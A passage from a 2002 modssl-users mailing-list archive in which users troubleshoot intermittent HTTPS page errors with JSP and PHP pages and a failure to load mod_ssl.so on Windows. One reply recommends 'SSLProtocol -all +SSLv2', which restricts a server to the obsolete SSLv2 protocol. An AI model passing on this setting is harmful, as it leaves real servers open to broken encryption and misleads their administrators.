hyperlink to page B, another_static.html, no probs occur. BUT, if page A has a link to dynamic.jsp (as a GET: href=dynamic.jsp?some_id=12), *sometimes* a page not found error appears (or a security warning message). Sorry for my ignorance, Shiraz -----Original Message----- From: David Marshall [SMTP:dmarshall@esilicon.com] Sent: Tuesday, April 02, 2002 7:38 PM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Make sure that the "JSPs" in question are resolving their url's with the right protocol HTTPS/HTTP when appropriate. The JSPs may be trying to GET/POST with HTTP when they need to use HTTPS. Since you are using Apache and RESIN. I would assume that you are using the mod_caucho plug-in for Apache. David Marshall -----Original Message----- From: Shiraz Esat [mailto:shiraz.esat@designlinks.net] Sent: Tuesday, April 02, 2002 1:10 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Terry, If anyone passes you a solution, can you please pass it on to me as well, as I have the same problem :( [Only difference, though, is that I'm using PHP generated pages] Thanks in advance Shiraz -----Original Message----- From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] Sent: Friday, March 29, 2002 9:31 PM To: 'modssl-users@modssl.org' Subject: SSL cache issue I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak << File: ATT00002.htm >> ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 19:43:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10211; Wed, 3 Apr 2002 19:02:41 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA09863; Wed, 3 Apr 2002 18:59:02 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 31C194CE767; Wed, 3 Apr 2002 18:58:54 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g33Fxlx30602; Wed, 3 Apr 2002 17:59:47 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from digexch1.digarch.com id RAA01368; Wed, 3 Apr 2002 17:32:11 +0200 (MET DST) Received: from chorazin.digarch.com (CHORAZIN [10.5.1.149]) by digexch1.digarch.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id CWKBLZH0; Wed, 3 Apr 2002 09:31:30 -0600 Message-Id: <5.1.0.14.0.20020403093006.00a4ac20@digexch1> X-Sender: jburgess@digexch1 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 03 Apr 2002 09:31:46 -0600 To: modssl-users@modssl.org From: Jay Burgess Subject: RE: RE: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jay Burgess X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users At least on Windows NT, the .so file can not be read-only, or you get a similar error. Is it possible that your file is read-only? Jay > -----Original Message----- > From: Danalien [mailto:danalien@datormaffian.com] > Sent: Wednesday, April 03, 2002 9:18 AM > To: modssl-users@modssl.org > Subject: RE: RE: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > Japp, allready put it here. > > > > > >Can you go to c:/program files/apache_ssl/modules and see > the mod_ssl.so > >file? > > > >Your second test seems logical since the module wasn't loaded in the > >LoadModule section. > > > >Eric > > > >-----Original Message----- > >From: Danalien [mailto:danalien@datormaffian.com] > >Sent: Wednesday, April 03, 2002 8:52 AM > >To: modssl-users@modssl.org > >Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > > > > >Hi, > > > >I need some help, i patch, complie, and everything according to: > > > http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 > > > >all goes fine fine, only get a few warnings (during the > apache complie) > > > >I then go to the httpd.conf (%my_apache_ssl_root%/conf) > > > >and put this in: > > > >LoadModule ssl_module modules/mod_ssl.so > > > > > >and I get (this) when i do apache -t : > > > >C:\Program Files\Apache_SSL>apache -t > >Syntax error on line 62 of c:/program > files/apache_ssl/conf/httpd.conf: > >Cannot load c:/program files/apache_ssl/modules/mod_ssl.so > into server: > >(182) > >Note the errors or messages above, and press the key > to exit. 26... > >C:\Program Files\Apache_SSL> > > > >*thinking* *thinking*... > > > >... then I just do a little test. > > > >remove the previos loadModule by puting a # infront (lite this): > > > >#LoadModule ssl_module modules/mod_ssl.so > > > > > >and add: > > > >AddModule mod_ssl.c > > > > > >and get : > > > >C:\Program Files\Apache_SSL>apache -t > >Syntax error on line 110 of c:/program > files/apache_ssl/conf/httpd.conf: > >Cannot add module via name 'mod_ssl.c': not in list of loaded modules > >Note the errors or messages above, and press the key > to exit. 23... > >C:\Program Files\Apache_SSL> > > > > > >and do a apache -l > >where I get this: > > > >Compiled-in modules: > > http_core.c > > mod_so.c > > mod_mime.c > > mod_access.c > > mod_auth.c > > mod_negotiation.c > > mod_include.c > > mod_autoindex.c > > mod_dir.c > > mod_cgi.c > > mod_userdir.c > > mod_alias.c > > mod_env.c > > mod_log_config.c > > mod_asis.c > > mod_imap.c > > mod_actions.c > > mod_setenvif.c > > mod_isapi.c > > > > > >and my suspicions were correct, "where are/is the SSL - > module(s)?" cause it > >ain't in > >the compiled apache :) > > > >If some could explain/help me how to meld this SSL module > into apache, it > >would be great :) > >thanks. > > > > > > > > > > > > > >// with regards > >// ID :: danalien :: > > > >PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 > > > > > >_____________________________________________________________ > _________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPKsO/x6FoQlEaqKIEQIOiACdFE57iQebkBg6r1wIbjJf4TOWDYIAoKwY o1SRuk++dFNMuY/7MNbsgYT5 =Z7o4 -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 20:56:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA17432; Wed, 3 Apr 2002 20:15:29 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.dicecorp.com id UAA17197; Wed, 3 Apr 2002 20:13:40 +0200 (MET DST) Received: from DRAGON (internal154.dicecorp.com [192.168.100.154]) by www.dicecorp.com (8.11.1/8.11.1) with ESMTP id g33I7Oa31787 for ; Wed, 3 Apr 2002 13:07:25 -0500 From: "Jeremy Walton" To: Subject: RE: SSL cache issue Date: Wed, 3 Apr 2002 13:07:07 -0500 Message-ID: <002c01c1db3a$5e86e750$9a64a8c0@DRAGON> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <01C1DAFD.5963FA70.shiraz.esat@designlinks.net> Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeremy Walton" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Yes I've had this problem. One make sure a generate your OWN certificate and not one that comes with OpenSSL or distributions and add this to your SSL VirtualHost SSLProtocol -all +SSLv2 This should get rid of this problem. As I'm guessing that you have have had the same problem I have. This seemed to have fixed the problem. I think there is a problem with IE and OpenSSL using SSLv3 with an uncertified SSL certificate. Let me know if this has fixed your problem. Jeremy Walton DICE Corporation -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Shiraz Esat Sent: Wednesday, April 03, 2002 4:50 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Jeremy et al, Server-side: Linux, Apache 1.3.20, mod_ssl 2.8.4, OpenSSL 0.9.6b, PHP 4.1.2. Client-side: Win2000, IE5.5. Surely this is a server-side problem? Or, at least, surely there must be a 'fix' server-side? After all, do we need to tell all site-visitors to fix their browsers? Thanks in advance, Shiraz -----Original Message----- From: Jeremy Walton [SMTP:jeremyw@dicecorp.com] Sent: Tuesday, April 02, 2002 10:00 PM To: modssl-users@modssl.org Subject: RE: SSL cache issue Actually I've had this problem. I may have the solution for you if you can tell me what OS your running the client from and what browser. Jeremy Walton DICE Corporation -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Shiraz Esat Sent: Tuesday, April 02, 2002 4:10 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Terry, If anyone passes you a solution, can you please pass it on to me as well, as I have the same problem :( [Only difference, though, is that I'm using PHP generated pages] Thanks in advance Shiraz -----Original Message----- From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] Sent: Friday, March 29, 2002 9:31 PM To: 'modssl-users@modssl.org' Subject: SSL cache issue I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak << File: ATT00002.htm >> ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 21:41:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA24634; Wed, 3 Apr 2002 21:37:23 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from vega.fmf.uni-lj.si id VAA24496; Wed, 3 Apr 2002 21:35:32 +0200 (MET DST) Received: (qmail 8141 invoked by uid 0); 3 Apr 2002 18:30:43 -0000 Received: from kristijan@rip-computer.si by vega.fmf.uni-lj.si by uid 100 with qmail-scanner-1.10 (sweep: 2.9/3.54. . Clear:0. Processed in 0.432614 secs); 03 Apr 2002 18:30:43 -0000 Received: from vs1.fmf.uni-lj.si (HELO kekec) (193.2.110.23) by 0 with SMTP; 3 Apr 2002 18:30:43 -0000 Message-ID: <004301c1db3e$3c531e20$176e02c1@kekec> From: "Kristijan Cafuta RIP" To: References: <200204031451.g33Eppd02575@d1o900.telia.com> Subject: Re: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) Date: Wed, 3 Apr 2002 20:34:48 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kristijan Cafuta RIP" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users in Apache conf file you shoul add both, first LoadModule ssl_module modules/mod_ssl.so and an somewhere after that AddModule mod_ssl.c but I think this error also reports when someone forget to copy the files ssleay32.dll and libeay32.dll to WINNT\System32 did you do it? ----- Original Message ----- From: "Danalien" To: Sent: Wednesday, April 03, 2002 4:51 PM Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi, > > I need some help, i patch, complie, and everything according to: > http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 > > all goes fine fine, only get a few warnings (during the apache complie) > > I then go to the httpd.conf (%my_apache_ssl_root%/conf) > > and put this in: > > LoadModule ssl_module modules/mod_ssl.so > > > and I get (this) when i do apache -t : > > C:\Program Files\Apache_SSL>apache -t > Syntax error on line 62 of c:/program files/apache_ssl/conf/httpd.conf: > Cannot load c:/program files/apache_ssl/modules/mod_ssl.so into server: (182) > Note the errors or messages above, and press the key to exit. 26... > C:\Program Files\Apache_SSL> > > *thinking* *thinking*... > > ... then I just do a little test. > > remove the previos loadModule by puting a # infront (lite this): > > #LoadModule ssl_module modules/mod_ssl.so > > > and add: > > AddModule mod_ssl.c > > > and get : > > C:\Program Files\Apache_SSL>apache -t > Syntax error on line 110 of c:/program files/apache_ssl/conf/httpd.conf: > Cannot add module via name 'mod_ssl.c': not in list of loaded modules > Note the errors or messages above, and press the key to exit. 23... > C:\Program Files\Apache_SSL> > > > and do a apache -l > where I get this: > > Compiled-in modules: > http_core.c > mod_so.c > mod_mime.c > mod_access.c > mod_auth.c > mod_negotiation.c > mod_include.c > mod_autoindex.c > mod_dir.c > mod_cgi.c > mod_userdir.c > mod_alias.c > mod_env.c > mod_log_config.c > mod_asis.c > mod_imap.c > mod_actions.c > mod_setenvif.c > mod_isapi.c > > > and my suspicions were correct, "where are/is the SSL - module(s)?" cause it ain't in > the compiled apache :) > > If some could explain/help me how to meld this SSL module into apache, it would be great :) > thanks. > > > > > > > // with regards > // ID :: danalien :: > > PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 > > -----BEGIN PGP SIGNATURE----- > Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. > > iQA/AwUBPKsI9x6FoQlEaqKIEQKKOQCfQTAK3SV7vSoe8aE8YQqv7cjVqrQAoOe7 > DmQQDW2F53itoAyTwCj7zlEj > =hTM+ > -----END PGP SIGNATURE----- > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 22:36:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA28816; Wed, 3 Apr 2002 22:19:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id WAA28698; Wed, 3 Apr 2002 22:17:47 +0200 (MET DST) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Wed, 3 Apr 2002 10:31:24 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1D6A@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: SSL cache issue Date: Wed, 3 Apr 2002 10:31:23 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Shiraz, Fundamentally, the url's resolve the same. With JSP some URLs resolve at the Browser, and some URL's resolve on the JSP server. However, just like someone can "hardcode" HTTP into the HREF for static content, so can JSP developers generate HTTP references dynamically when thay might need to generate HTTPS. A lot depends on how the JSP is coded and how the JSP/Servlet engine is connected to Apache. For example, I've seen one installation where mod_proxy was used to switch from https in apache to redirect http to a jsp server. Since this was using a RESIN JSP engine getting this installation switched to using mod_caucho instead of mod_proxy resolved the JSP logic that was trying to detect HTTP/HTTPS protocol. In your example Page A has a link to dynamic.jsp. If possible, you should use your browser to "view" source on the output of dynamic.jsp. In reviewing the source at the browser any "HTTP" links will cause a security warning message. In addition, I have found it necessary to review the actual JSP source. Some JSP's will resolve URLs on the server and get page not found errors on the server. An example could be Server side URL reference with HTTP that needs to be HTTPS. David -----Original Message----- From: Shiraz Esat [mailto:shiraz.esat@designlinks.net] Sent: Wednesday, April 03, 2002 2:03 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue David and others, Why would a JSP (or PHP, or any dynamically created page) resolve their URL differently from a 'static' page? If page A, static.html, has a hyperlink to page B, another_static.html, no probs occur. BUT, if page A has a link to dynamic.jsp (as a GET: href=dynamic.jsp?some_id=12), *sometimes* a page not found error appears (or a security warning message). Sorry for my ignorance, Shiraz -----Original Message----- From: David Marshall [SMTP:dmarshall@esilicon.com] Sent: Tuesday, April 02, 2002 7:38 PM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Make sure that the "JSPs" in question are resolving their url's with the right protocol HTTPS/HTTP when appropriate. The JSPs may be trying to GET/POST with HTTP when they need to use HTTPS. Since you are using Apache and RESIN. I would assume that you are using the mod_caucho plug-in for Apache. David Marshall -----Original Message----- From: Shiraz Esat [mailto:shiraz.esat@designlinks.net] Sent: Tuesday, April 02, 2002 1:10 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Terry, If anyone passes you a solution, can you please pass it on to me as well, as I have the same problem :( [Only difference, though, is that I'm using PHP generated pages] Thanks in advance Shiraz -----Original Message----- From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] Sent: Friday, March 29, 2002 9:31 PM To: 'modssl-users@modssl.org' Subject: SSL cache issue I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak << File: ATT00002.htm >> ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 23:16:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA01265; Wed, 3 Apr 2002 22:38:29 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maila.telia.com id WAA01060; Wed, 3 Apr 2002 22:36:36 +0200 (MET DST) Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241]) by maila.telia.com (8.11.6/8.11.6) with ESMTP id g33KaYD19473 for ; Wed, 3 Apr 2002 22:36:35 +0200 (CEST) Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43]) by d1o900.telia.com (8.10.2/8.10.1) with SMTP id g33KaTd18634 for ; Wed, 3 Apr 2002 22:36:29 +0200 (CEST) Message-Id: <200204032036.g33KaTd18634@d1o900.telia.com> From: "Danalien" To: "modssl-users@modssl.org" Date: Wed, 03 Apr 2002 22:36:26 +0200 X-Mailer: PMMail 2000 Professional (2.20.2360) For Windows 2000 (5.0.2195;2) In-Reply-To: <5.1.0.14.0.20020403093006.00a4ac20@digexch1> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Subject: RE: RE: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Danalien" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 nope, I have no attributes on it/them. >At least on Windows NT, the .so file can not be read-only, or you get a >similar error. > >Is it possible that your file is read-only? > >Jay > > > -----Original Message----- > > From: Danalien [mailto:danalien@datormaffian.com] > > Sent: Wednesday, April 03, 2002 9:18 AM > > To: modssl-users@modssl.org > > Subject: RE: RE: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > > > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > > > Japp, allready put it here. > > > > > > > > > > >Can you go to c:/program files/apache_ssl/modules and see > > the mod_ssl.so > > >file? > > > > > >Your second test seems logical since the module wasn't loaded in the > > >LoadModule section. > > > > > >Eric > > > > > >-----Original Message----- > > >From: Danalien [mailto:danalien@datormaffian.com] > > >Sent: Wednesday, April 03, 2002 8:52 AM > > >To: modssl-users@modssl.org > > >Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > > > > > > > >Hi, > > > > > >I need some help, i patch, complie, and everything according to: > > > > > http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 > > > > > >all goes fine fine, only get a few warnings (during the > > apache complie) > > > > > >I then go to the httpd.conf (%my_apache_ssl_root%/conf) > > > > > >and put this in: > > > > > >LoadModule ssl_module modules/mod_ssl.so > > > > > > > > >and I get (this) when i do apache -t : > > > > > >C:\Program Files\Apache_SSL>apache -t > > >Syntax error on line 62 of c:/program > > files/apache_ssl/conf/httpd.conf: > > >Cannot load c:/program files/apache_ssl/modules/mod_ssl.so > > into server: > > >(182) > > >Note the errors or messages above, and press the key > > to exit. 26... > > >C:\Program Files\Apache_SSL> > > > > > >*thinking* *thinking*... > > > > > >... then I just do a little test. > > > > > >remove the previos loadModule by puting a # infront (lite this): > > > > > >#LoadModule ssl_module modules/mod_ssl.so > > > > > > > > >and add: > > > > > >AddModule mod_ssl.c > > > > > > > > >and get : > > > > > >C:\Program Files\Apache_SSL>apache -t > > >Syntax error on line 110 of c:/program > > files/apache_ssl/conf/httpd.conf: > > >Cannot add module via name 'mod_ssl.c': not in list of loaded modules > > >Note the errors or messages above, and press the key > > to exit. 23... > > >C:\Program Files\Apache_SSL> > > > > > > > > >and do a apache -l > > >where I get this: > > > > > >Compiled-in modules: > > > http_core.c > > > mod_so.c > > > mod_mime.c > > > mod_access.c > > > mod_auth.c > > > mod_negotiation.c > > > mod_include.c > > > mod_autoindex.c > > > mod_dir.c > > > mod_cgi.c > > > mod_userdir.c > > > mod_alias.c > > > mod_env.c > > > mod_log_config.c > > > mod_asis.c > > > mod_imap.c > > > mod_actions.c > > > mod_setenvif.c > > > mod_isapi.c > > > > > > > > >and my suspicions were correct, "where are/is the SSL - > > module(s)?" cause it > > >ain't in > > >the compiled apache :) > > > > > >If some could explain/help me how to meld this SSL module > > into apache, it > > >would be great :) > > >thanks. > > > > > > > > > > > > > > > > > > > > >// with regards > > >// ID :: danalien :: > > > > > >PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 > > > > > > > > >_____________________________________________________________ > > _________ > > >Apache Interface to OpenSSL (mod_ssl) >www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > > > > >// with regards >// ID :: danalien :: > >PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 > >At least on Windows NT, the .so file can not be read-only, or you get a >similar error. > >Is it possible that your file is read-only? > >Jay > > > -----Original Message----- > > From: Danalien [mailto:danalien@datormaffian.com] > > Sent: Wednesday, April 03, 2002 9:18 AM > > To: modssl-users@modssl.org > > Subject: RE: RE: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > > > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > > > Japp, allready put it here. > > > > > > > > > > >Can you go to c:/program files/apache_ssl/modules and see > > the mod_ssl.so > > >file? > > > > > >Your second test seems logical since the module wasn't loaded in the > > >LoadModule section. > > > > > >Eric > > > > > >-----Original Message----- > > >From: Danalien [mailto:danalien@datormaffian.com] > > >Sent: Wednesday, April 03, 2002 8:52 AM > > >To: modssl-users@modssl.org > > >Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > > > > > > > >Hi, > > > > > >I need some help, i patch, complie, and everything according to: > > > > > http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 > > > > > >all goes fine fine, only get a few warnings (during the > > apache complie) > > > > > >I then go to the httpd.conf (%my_apache_ssl_root%/conf) > > > > > >and put this in: > > > > > >LoadModule ssl_module modules/mod_ssl.so > > > > > > > > >and I get (this) when i do apache -t : > > > > > >C:\Program Files\Apache_SSL>apache -t > > >Syntax error on line 62 of c:/program > > files/apache_ssl/conf/httpd.conf: > > >Cannot load c:/program files/apache_ssl/modules/mod_ssl.so > > into server: > > >(182) > > >Note the errors or messages above, and press the key > > to exit. 26... > > >C:\Program Files\Apache_SSL> > > > > > >*thinking* *thinking*... > > > > > >... then I just do a little test. > > > > > >remove the previos loadModule by puting a # infront (lite this): > > > > > >#LoadModule ssl_module modules/mod_ssl.so > > > > > > > > >and add: > > > > > >AddModule mod_ssl.c > > > > > > > > >and get : > > > > > >C:\Program Files\Apache_SSL>apache -t > > >Syntax error on line 110 of c:/program > > files/apache_ssl/conf/httpd.conf: > > >Cannot add module via name 'mod_ssl.c': not in list of loaded modules > > >Note the errors or messages above, and press the key > > to exit. 23... > > >C:\Program Files\Apache_SSL> > > > > > > > > >and do a apache -l > > >where I get this: > > > > > >Compiled-in modules: > > > http_core.c > > > mod_so.c > > > mod_mime.c > > > mod_access.c > > > mod_auth.c > > > mod_negotiation.c > > > mod_include.c > > > mod_autoindex.c > > > mod_dir.c > > > mod_cgi.c > > > mod_userdir.c > > > mod_alias.c > > > mod_env.c > > > mod_log_config.c > > > mod_asis.c > > > mod_imap.c > > > mod_actions.c > > > mod_setenvif.c > > > mod_isapi.c > > > > > > > > >and my suspicions were correct, "where are/is the SSL - > > module(s)?" cause it > > >ain't in > > >the compiled apache :) > > > > > >If some could explain/help me how to meld this SSL module > > into apache, it > > >would be great :) > > >thanks. > > > > > > > > > > > > > > > > > > > > >// with regards > > >// ID :: danalien :: > > > > > >PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 > > > > > > > > >_____________________________________________________________ > > _________ > > >Apache Interface to OpenSSL (mod_ssl) >www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > > > > >// with regards >// ID :: danalien :: > >PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 > >-----BEGIN PGP SIGNATURE----- >Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and >its affiliated companies. > >iQA/AwUBPKsO/x6FoQlEaqKIEQIOiACdFE57iQebkBg6r1wIbjJf4TOWDYIAoKwY >o1SRuk++dFNMuY/7MNbsgYT5 >=Z7o4 >-----END PGP SIGNATURE----- > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL 